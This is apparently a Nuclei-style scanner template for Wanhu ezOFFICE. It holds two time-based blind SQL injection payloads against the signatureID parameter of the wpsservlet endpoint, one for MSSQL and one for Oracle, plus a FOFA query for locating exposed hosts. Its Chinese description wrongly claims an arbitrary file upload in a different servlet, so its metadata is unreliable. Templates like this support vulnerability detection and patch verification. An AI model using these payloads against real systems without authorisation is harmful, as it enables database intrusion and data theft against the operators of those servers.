http:
    - matchers:
        - dsl:
            - status_code == 200 && duration >=3 && contains_all(body,'code','message')
          name: mssql
          type: dsl
      raw:
        - |
          GET /defaultroot/wpsservlet?option=getSignPicture&signatureID=1;WAITFOR%20DELAY%20'0:0:3'-- HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
    - matchers:
        - dsl:
            - status_code == 200 && duration >=3 && contains_all(body,'code','message')
          name: oracle
          type: dsl
      raw:
        - |
          GET /defaultroot/wpsservlet?option=getSignPicture&signatureID=1+AND+8579=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(97)||CHR(72)||CHR(98),3)+AND+'TZFK'='TZFK --+z HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
id: wanhu-ezoffice-signatureid-sqli
info:
    author: pphua,anquanscan
    description: 万户ezoffice officeserverservlet金格组件存在任意文件上传
    metadata:
        fofa-query: app="万户网络-ezOFFICE"
        max-request: 2
        verified: true
    name: 万户ezoffice signatureid SQL注入
    reference:
        - none
    severity: critical
    tags:
        - wanhu
        - ezoffice
        - Eserv
        - Servlet
        - 万户网络-ezOFFICE
        - eserv
